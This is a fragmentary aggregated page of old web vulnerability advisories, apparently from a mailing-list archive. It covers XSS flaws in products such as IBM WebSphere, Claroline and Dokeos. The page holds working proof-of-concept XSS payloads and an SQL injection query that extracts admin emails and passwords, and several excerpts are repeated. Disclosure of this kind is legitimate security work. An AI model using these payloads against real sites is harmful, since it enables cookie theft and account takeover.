New User, Welcome!     Login

XSS')</script

[DSECRG-09-013] IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities

Attacker can inject XSS in URL string.

Example:

http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp

Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator. 

2. PlantsByWebSphere Sample multiple XSS vulnerabilities.

[DSECRG-09-019] Apache Geronimo - XSS vulnerabilities.txt

Attacker can inject XSS in URL string.

Example:

http://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--


2. Multiple Stored XSS vulnerabilities found in script 

/console/portal/Server/Monitoring

eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities

        3.1. SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
                -------------
                Find Admin's password:
                        http://[URL]/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
                XSS attacks:
                        http://[URL]/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script>
                        http://[URL]/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script>
                -------------
        3.2. SQL Injection in "preview.asp" in "template_id" parameter.
                -------------
                Find Admin's password:

[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities

POST parameters "tasks_perpage", "time_zone", "account_enabled", "notify_own".

Example:

tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src="javascript:alert('DSecRG XSS')">


1.2 Vulnerabilities found in script index.php?do=admin&area=newproject.

eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities

        3.1. SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
                -------------
                Find Admin's password:
                        http://[URL]/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
                XSS attacks:
                        http://[URL]/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script>
                        http://[URL]/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script>
                -------------
        3.2. SQL Injection in "preview.asp" in "template_id" parameter.
                -------------
                Find Admin's password:

eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities

        3.1. SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
                -------------
                Find Admin's password:
                        http://[URL]/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
                XSS attacks:
                        http://[URL]/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script>
                        http://[URL]/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script>
                -------------
        3.2. SQL Injection in "preview.asp" in "template_id" parameter.
                -------------
                Find Admin's password:

[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/"><script>alert('DSecRG XSS')</script>

---------------------------------------------------------------------


2. Stored XSS

2z-project 0.9.6.1 Multiple Security Vulnerabilities

parameter name = contentshort
parameter name = contentfull

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>


1.2 Vulnerability in script http://[server]/[installdir]/2z/admin.php?mod=pm&action=write

[DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1

Attacker can inject XSS in GET parameter "url"

Example:

http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=<script>alert('DSecRG XSS')</script>


2.2 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBselectorContents.php 

Attacker can inject XSS in GET parameter "ForEditor".

[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities

Attacker can inject XSS in URL string.

Example:

http://[server]/[installdir]/claroline/calendar/myagenda.php?"><script>alert('DSecRG XSS')</script> 
http://[server]/[installdir]/claroline/user/user.php?"><script>alert('DSecRG XSS')</script>


1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php

[DSECRG-08-030] Claroline 1.8.9 Multiple Security Vulnerabilities

Attacker can inject XSS in URL string.

Example:

http://[server]/[installdir]/claroline/course/index.php?"><script>alert('DSecRG XSS')</script> 
http://[server]/[installdir]/claroline/phpbb/newtopic.php?"><script>alert('DSecRG XSS')</script>


1.2 Linked XSS vulnerability found in claroline/document/rqmkhtml.php

[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities

2. Linked XSS vulnerability found in /textpattern/setup/index.php, attacker can inject XSS in URL string.


Example:

http://[server]/[installdir]/textpattern/setup/index.php/"><script>alert('DSecRG XSS')</script>

--------------------------------------------------------------------------------------------


3. XSS in POST

[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS

Linked XSS vulnerability found in scripts:

user/help/help.shtml
user/help/general_help_user.shtml

Attacker can inject XSS script in URL.

Example:

http://[server]/user/help/help.shtml?<script>alert('DSecRG XSS')</script>
http://[server]/user/help/general_help_user.shtml?<script>alert('DSecRG XSS')</script>

Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities

                <input type=submit name=submit_for_rating value="Go!">
                </form>
                -------------
        3.3. Reflected XSS attack in "/login.php" in URL parameters.
                -------------
                http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
                -------------
        3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
                -------------
                http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
                -------------

Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities

                <input type=submit name=submit_for_rating value="Go!">
                </form>
                -------------
        3.3. Reflected XSS attack in "/login.php" in URL parameters.
                -------------
                http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
                -------------
        3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
                -------------
                http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
                -------------

Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities

                <input type=submit name=submit_for_rating value="Go!">
                </form>
                -------------
        3.3. Reflected XSS attack in "/login.php" in URL parameters.
                -------------
                http://[URL]/login.php?Fake=<fake><script>alert(/sdl BugReport.IR xss/)</script>
                -------------
        3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
                -------------
                http://[URL]/hta/htmlarea.js.php?glb_sid=<script>alert(/sdl BugReport.IR xss/)</script>
                -------------

[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php attacker can inject XSS in parameter courseCode 


Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode="><script>alert('DSecRG XSS')</script>



4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker can inject XSS in parameter category

[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS

/admin/credits.php
/upgrade/index.php

Example:

http://[server]/[installdir]/admin/login.php/"><script>alert("DSecRG XSS")</script>
http://[server]/[installdir]/upgrade/index.php/"><IMG SRC="javascript:alert('DSecRG XSS')

---------------------------------------------------------------------

MoinMoin Wiki Engine XSS Vulnerability

Vendor Fix:  Upgrade to version 1.8.1 

Public Posting: 01-19-09

Example:
http://moinmo.in/moinmoin/WikiSandBox?rename="><script>alert('rename xss')</script>&action=AttachFile&drawing="><script>alert('drawing xss')</script>

[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS

GET parameter "Attach_Id"

Example:

http://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert('DSecRG XSS')</script>



About
*****

[DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.

Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS in parameter cmd

Example:


http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>


Fix Information
***************

Re: [DSECRG-08-007] OpenBSD BGPD daemon Web Interface XSS.

> Linked XSS vulnerability found in script /cgi-bin/bgplg attacker can inject XSS in parameter cmd

> Example:


> http://[server]/cgi-bin/bgplg?cmd=shov+version<script>alert('DSecRG XSS')</script>


> Fix Information
> ***************

Nucleus 3.31 XSS in path

Linked XSS vulnerability found in action.php, attacker can inject XSS in URL string:

Example:

        http://[server]/[installdir]/action.php/"><script>alert('DSecRG XSS')</script>


Fix Information
***************

Blaze Apps Multiple Vulnerabilities

above and then fill ?? with
        the user id of the admin which is the same process).

+--> Exploiting The Stored XSS Vulnerablity:
        It can be exploited by posting a vector like "<script>alert('Stored  
XSS')</script>" to the forum.
        (see "<SRC_DIR>/BlazeApps/Usercontrols/Forum/addpost.ascx.vb")

####################
- Solution:
####################

[!!FIX Information ] Nucleus 3.31 XSS in path

Linked XSS vulnerability found in action.php, attacker can inject XSS in URL string:

Example:

        http://[server]/[installdir]/action.php/"><script>alert('DSecRG XSS')</script>


Fix Information
***************

Re: [Aria-Security.com] vBulletin multiple XSS

This is not a bug as the administrator should be able to name f.ex. his smilies anything he wants to do!

Then the Administrator can also write XSS in his usertitle and report that as a vulnerability? I see it more like a function rather than a vulnerability, cause!

If an admin makes a new custom template with custom html code, then that admin can put <script>alert('omg xss')</script> if he wants to. It's simply just functionality not bugs.

I hope you understand my concern and why it is important for me to say that this is not a bug.


Best Regards,

Metrica Service Assurance Multiple Cross Site Scripting

Exploit

http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!--&date=0000000000000

http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>

http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant

JSPWiki Multiple Vulnerabilities

Cross Site Scripting Vulnerabilities:
------------------------------------------------------------
http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test

    Vulnerable Parameters:
        group=Test"<script>alert("Test+XSS")</script>
        members= Test"<script>alert("Test+XSS")</script>

    Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save

ARISg5 (version 5.0) cross site scripting vulnerability

Remote: Yes
Credit: Yaniv Miron
Exploit:

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>

Yaniv Miron aka "Lament".
lament@ilhack.org


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!